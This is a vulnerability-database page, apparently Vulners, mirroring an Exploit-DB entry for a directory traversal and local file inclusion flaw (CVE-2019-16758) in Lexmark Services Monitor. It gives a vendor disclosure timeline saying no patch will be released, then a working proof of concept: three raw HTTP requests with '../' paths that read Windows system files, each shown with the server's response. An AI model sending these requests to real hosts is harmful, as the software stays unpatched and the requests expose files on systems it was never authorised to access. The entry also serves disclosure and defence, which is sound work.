Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal

🗓️ 18 Nov 2019 00:00:00Reported by Kevin RandallType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 221 Views

Lexmark Services Monitor 2.27.4.0.39 vulnerable to Directory Traversal and Local File Inclusio

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2019-16758
26 Feb 202409:41
circl
CNVD		Lexmark Services Monitor Directory Traversal Vulnerability (CNVD-2020-03042)
20 Nov 201900:00
cnvd
CVE		CVE-2019-16758
21 Nov 201917:56
cve
Cvelist		CVE-2019-16758
21 Nov 201917:56
cvelist
Dsquare		Lexmark Services Monitor File Disclosure
22 Nov 201900:00
dsquare
exploitpack		Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
18 Nov 201900:00
exploitpack
NVD		CVE-2019-16758
21 Nov 201918:15
nvd
OSV		CVE-2019-16758
21 Nov 201918:15
osv
Prion		Directory traversal
21 Nov 201918:15
prion
RedhatCVE		CVE-2019-16758
22 May 202510:36
redhatcve
Rows per page
# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
# Google Dork: N/A​
# Date: 2019​-11-15
# Exploit Author: Kevin Randall​
# Vendor Homepage: https://www.lexmark.com/en_us.html​
# Software Link: https://www.lexmark.com/en_us.html​
# Version: 2.27.4.0.39 (Latest Version)​
# Tested on: Windows Server 2012​
# CVE : CVE-2019-16758
​
​
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.​
​
Timeline:​
Discovered on: 9/24/2019​
Vendor Notified: 9/24/2019​
Vendor Confirmed Receipt of Vulnerability: 9/24/2019​
Follow up with Vendor: 9/25/2019​
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019​
Vendor Confirmed Vulnerability is Valid: 9/26/2019​
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019​
Vendor Confirmed Signoff to Disclose: 9/27/2019​
Final Email Sent: 9/27/2019​
Public Disclosure: 11/15/2019​
​
PoC:​
​
GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 848536​
​
​
.​
.​
.​
.[.P.e.r.f.l.i.b.].​
.​
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.​
.​
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.​
.​
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.​
.​
.​
.​
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].​
.​
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.​
.​
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.​
.​
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.​
.​
.L.a.s.t. .H.e.l.p.=.5.0.4.1.​
.​
.​
.​
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].​
.​
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.​
​
​
GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 38710​
​
..[.S.t.r.i.n.g.s.].​
.​
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".​
.​
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".​
.​
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".​
.​
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".​
.​
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".​
.​
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
.​
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".​
​
​
​
​
GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 17463​
​
# Copyright (c) 1993-2004 Microsoft Corp.​
#​
# This file contains port numbers for well-known services defined by IANA​
#​
# Format:​
#​
# <service name>  <port number>/<protocol>  [aliases...]   [#<comment>]​
#​
​
echo                7/tcp​
echo                7/udp​
discard             9/tcp    sink null​
discard             9/udp    sink null​
systat             11/tcp    users                  #Active users​
systat             11/udp    users                  #Active users​
daytime            13/tcp​
daytime            13/udp​
qotd               17/tcp    quote                  #Quote of the day​
qotd               17/udp    quote                  #Quote of the day​
chargen            19/tcp    ttytst source          #Character generator​
chargen            19/udp    ttytst source          #Character generator​
ftp-data           20/tcp                           #FTP, data​
ftp                21/tcp                           #FTP. control​
ssh                22/tcp                           #SSH Remote Login Protocol​
telnet             23/tcp​
smtp               25/tcp    mail                   #Simple Mail Transfer Protocol​
time               37/tcp    timserver

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Nov 2019 00:00Current
7High risk
Vulners AI Score7
CVSS 25
CVSS 3.17.5
EPSS0.18841
lexmarkservices monitordirectory traversallocal file inclusionwindows server 2012cve-2019-16758tcp port 2070vulnerabilityvendorpocpublic disclosure
221